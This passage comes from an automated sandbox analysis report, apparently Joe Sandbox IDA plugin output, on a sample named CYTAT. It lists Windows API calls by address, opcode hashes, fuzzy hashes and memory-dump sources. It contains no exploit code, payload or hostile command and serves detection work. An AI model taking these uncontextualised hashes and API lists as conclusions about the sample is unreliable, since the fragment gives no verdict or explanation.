                                                 • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                                                • Instruction ID: c6101d665a98d140be62f029472ab7f8db1b0ce4c02a7c647e8453833b83309f
                                                • Opcode Fuzzy Hash: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                                                • Instruction Fuzzy Hash: 5F21B672204110ABEB108F699C85B6F7798EB49370F24463BF625C62E0DB74D8C1C76D
                                                APIs
                                                • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 00471A45
                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,00000000,?,00000001), ref: 00471A86
                                                • SendMessageW.USER32(?,00001303,00000000,00000000), ref: 00471AA8
                                                • ImageList_ReplaceIcon.COMCTL32(?,?,?,?,00000000,?,00000001), ref: 00471ABF
                                                • SendMessageW.USER32 ref: 00471AE3
                                                • DestroyIcon.USER32(?), ref: 00471AF4
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Icon$ImageList_MessageSend$CreateDestroyExtractReplace
                                                • String ID:
                                                • API String ID: 3611059338-0
                                                • Opcode ID: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                                                • Instruction ID: ff529b192773d28f9e5fe2f6f8d7a9043cb056f7fe4a3f7912da33dbd9270a4a
                                                • Opcode Fuzzy Hash: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                                                • Instruction Fuzzy Hash: FB21AB71600204AFEB10CF64DD85FAA73B5FF88700F10846EFA05AB290DBB4A9428B64
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: DestroyWindow$DeleteObject$IconMove
                                                • String ID:
                                                • API String ID: 1640429340-0
                                                • Opcode ID: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                                                • Instruction ID: 1af524ae86da71fe4f89171a472fc693caa25f853ed14bd6ff7d4c509651bbe6
                                                • Opcode Fuzzy Hash: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                                                • Instruction Fuzzy Hash: C6311874200A41DFC710DF24D9D8B3A77E9FB48712F0445AAE946CB262D778E848CB69
                                                APIs
                                                  • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                  • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                • _wcslen.LIBCMT ref: 004438CD
                                                • _wcslen.LIBCMT ref: 004438E6
                                                • _wcstok.LIBCMT ref: 004438F8
                                                • _wcslen.LIBCMT ref: 0044390C
                                                • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0044391A
                                                • _wcstok.LIBCMT ref: 00443931
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: _wcslen$_wcstok$ExtentPoint32Text_wcscpy
                                                • String ID:
                                                • API String ID: 3632110297-0
                                                • Opcode ID: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                                                • Instruction ID: d12b8bce329459066c03420e1b0c57cf331e6d1a2def9435cce8fb2ce1fb425a
                                                • Opcode Fuzzy Hash: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                                                • Instruction Fuzzy Hash: 9621B072900305ABDB10AF559C82AAFB7F8FF48711F64482EF95993301E678EA5087A5
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Destroy$DeleteMenuObject$IconWindow
                                                • String ID:
                                                • API String ID: 752480666-0
                                                • Opcode ID: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                                                • Instruction ID: 7b220c8407ffc283b2c26cc65a644285b0b18e1ed163c7e0472fb9f2b18bc557
                                                • Opcode Fuzzy Hash: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                                                • Instruction Fuzzy Hash: B7215970600A01DFD714DF29D9E8B3A7BA9BF49312F04855AE8468B352C738EC89CB59
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                • String ID:
                                                • API String ID: 3275902921-0
                                                • Opcode ID: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                                                • Instruction ID: 11d86efc281b6c380d974b68bd8b9632be9d9c574e85584f431c859402bfc888
                                                • Opcode Fuzzy Hash: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                                                • Instruction Fuzzy Hash: 9C217C70200A01DFC714DF39D998A6AB7E4BF49311F10862EE959C7392D778D845CB58
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                • String ID:
                                                • API String ID: 3275902921-0
                                                • Opcode ID: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                                                • Instruction ID: f2615e71845bffb995fe2c2b9381f89f67980fa6d4eb7dd8f13843e5971e4781
                                                • Opcode Fuzzy Hash: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                                                • Instruction Fuzzy Hash: 54213D70200A01DFD710EF25D9D4A2B37E9BF49312F10896EE945CB352D739D845CB69
                                                APIs
                                                • Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                • QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331D4
                                                • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331DE
                                                • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331E6
                                                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331F0
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: PerformanceQuery$CounterSleep$Frequency
                                                • String ID:
                                                • API String ID: 2833360925-0
                                                • Opcode ID: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                                                • Instruction ID: f8c058edd9890a080c9b5d5c764251204f1987641da473bf5ecf7e3e358c806a
                                                • Opcode Fuzzy Hash: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                                                • Instruction Fuzzy Hash: 1911B632D0011DABCF00DFD9EA489EEB778FF49722F1145AAED04A6204DB755A01CBA4
                                                APIs
                                                • SendMessageW.USER32 ref: 004555C7
                                                • SendMessageW.USER32(?,00001008,00000000,00000000), ref: 004555E2
                                                • DeleteObject.GDI32(?), ref: 00455736
                                                • DeleteObject.GDI32(?), ref: 00455744
                                                • DestroyIcon.USER32(?), ref: 00455752
                                                • DestroyWindow.USER32(?), ref: 00455760
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: DeleteDestroyMessageObjectSend$IconWindow
                                                • String ID:
                                                • API String ID: 3691411573-0
                                                • Opcode ID: a36765697229ff4e213bf7548d3c220621229afc2c11469716cb0ded27b8d901
                                                • Instruction ID: 7bbaf3a525edecc9c7f674a1bc178dbce74773f27e06def1294b58b6a87c9b54
                                                • Opcode Fuzzy Hash: a36765697229ff4e213bf7548d3c220621229afc2c11469716cb0ded27b8d901
                                                • Instruction Fuzzy Hash: 3D116071204601DBC710DF69EDC8A2A77A8FB58322F10466AFD10DB292D779D849CB68
                                                APIs
                                                  • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                  • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                  • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                  • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                  • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                • MoveToEx.GDI32(?,?,?,00000000), ref: 004472A0
                                                • LineTo.GDI32(?,?,?), ref: 004472AC
                                                • MoveToEx.GDI32(?,?,?,00000000), ref: 004472BA
                                                • LineTo.GDI32(?,?,?), ref: 004472C6
                                                • EndPath.GDI32(?), ref: 004472D6
                                                • StrokePath.GDI32(?), ref: 004472E4
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: ObjectPath$LineMoveSelect$BeginCreateDeleteStroke
                                                • String ID:
                                                • API String ID: 372113273-0
                                                • Opcode ID: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                                                • Instruction ID: 9972a7b2ea06d4c5ad2b855a17b8a9a0d98d12ec42d2644493c4a69bc6448ed6
                                                • Opcode Fuzzy Hash: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                                                • Instruction Fuzzy Hash: 7701BC76101214BBE3119B44ED8DFDF7B6CEF4A710F104259FA01A629187F42A02CBBD
                                                APIs
                                                • GetDC.USER32(00000000), ref: 0044CC6D
                                                • GetDeviceCaps.GDI32(00000000,00000058), ref: 0044CC78
                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0044CC84
                                                • ReleaseDC.USER32(00000000,00000000), ref: 0044CC90
                                                • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCA8
                                                • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCB9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: CapsDevice$Release
                                                • String ID:
                                                • API String ID: 1035833867-0
                                                • Opcode ID: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                                                • Instruction ID: 48d0fedbc9b5ed1f8cca1220e36c4d83aa6571d18a2c693a8c9b468b660f0fbb
                                                • Opcode Fuzzy Hash: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                                                • Instruction Fuzzy Hash: 60015276240214BFFB009F95DD89F5A7BACFF54751F14802EFF089B240D6B098008BA4
                                                APIs
                                                • __getptd.LIBCMT ref: 0041708E
                                                  • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                                  • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                                                • __amsg_exit.LIBCMT ref: 004170AE
                                                • __lock.LIBCMT ref: 004170BE
                                                • InterlockedDecrement.KERNEL32(?), ref: 004170DB
                                                • _free.LIBCMT ref: 004170EE
                                                • InterlockedIncrement.KERNEL32(009E2DB0), ref: 00417106
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                • String ID:
                                                • API String ID: 3470314060-0
                                                • Opcode ID: 80714434994c9102abdbbcfc383ede657addd51ae4f203e3d2298efcf25a3187
                                                • Instruction ID: d92c7102fc6d098775a0f5363b9b5483e5b10d08a1c29475ed017091780ded1e
                                                • Opcode Fuzzy Hash: 80714434994c9102abdbbcfc383ede657addd51ae4f203e3d2298efcf25a3187
                                                • Instruction Fuzzy Hash: 3301AD32905711ABC721ABA698497DE7BB0AB04724F15416BF950A7381CB3CAAC1CFDD
                                                APIs
                                                • InterlockedExchange.KERNEL32(?,?), ref: 0044B655
                                                • EnterCriticalSection.KERNEL32(?), ref: 0044B666
                                                • TerminateThread.KERNEL32(?,000001F6), ref: 0044B674
                                                • WaitForSingleObject.KERNEL32(?,000003E8,?,000001F6), ref: 0044B682
                                                  • Part of subcall function 00432614: CloseHandle.KERNEL32(00000000,00000000,?,0044B68E,00000000,?,000003E8,?,000001F6), ref: 00432622
                                                • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B697
                                                • LeaveCriticalSection.KERNEL32(?), ref: 0044B69E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                • String ID:
                                                • API String ID: 3495660284-0
                                                • Opcode ID: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                                                • Instruction ID: c0d5b59c8b9084ef0a5212f46b36de0b3fb5a8468090cd03c061fc2099eb7203
                                                • Opcode Fuzzy Hash: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                                                • Instruction Fuzzy Hash: A8F0AF72141201BBD210AB64EE8CDAFB77CFF88311F40092AFA0192560CBB4E420CBB6
                                                APIs
                                                • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00410AE8
                                                • MapVirtualKeyW.USER32(00000010,00000000), ref: 00410AF0
                                                • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00410AFB
                                                • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00410B06
                                                • MapVirtualKeyW.USER32(00000011,00000000), ref: 00410B0E
                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 00410B16
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Virtual
                                                • String ID:
                                                • API String ID: 4278518827-0
                                                • Opcode ID: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                                                • Instruction ID: ec5b0e47a8727e2ef01e8325cfcf1e1c5a721ad9102a6d662b709b351e7b749c
                                                • Opcode Fuzzy Hash: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                                                • Instruction Fuzzy Hash: 79016770106B88ADD3309F668C84B47FFF8EF95704F01491DD1D507A52C6B5A84CCB69
                                                APIs
                                                • ___set_flsgetvalue.LIBCMT ref: 004151C0
                                                  • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                  • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                • ___fls_getvalue@4.LIBCMT ref: 004151CB
                                                  • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                • ___fls_setvalue@8.LIBCMT ref: 004151DD
                                                • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                                                • ExitThread.KERNEL32 ref: 004151ED
                                                • __freefls@4.LIBCMT ref: 00415209
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                • String ID:
                                                • API String ID: 442100245-0
                                                • Opcode ID: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                                                • Instruction ID: 28e435cdead01fd65333368df2891c86ea6a44e569ea48f613a140ff37384f5b
                                                • Opcode Fuzzy Hash: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                                                • Instruction Fuzzy Hash: FEF01975544700AFC704BF76C54D9CE7BB99F94349720845EB80887222DA3CD8C2C669
                                                APIs
                                                  • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                  • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                • GetMenuItemInfoW.USER32(?,00000000), ref: 0045F85C
                                                • _wcslen.LIBCMT ref: 0045F94A
                                                • SetMenuItemInfoW.USER32(00000011,00000000,00000000,?), ref: 0045F9AE
                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                • SetMenuDefaultItem.USER32(00000000,000000FF,00000000,?,00000000), ref: 0045F9CA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
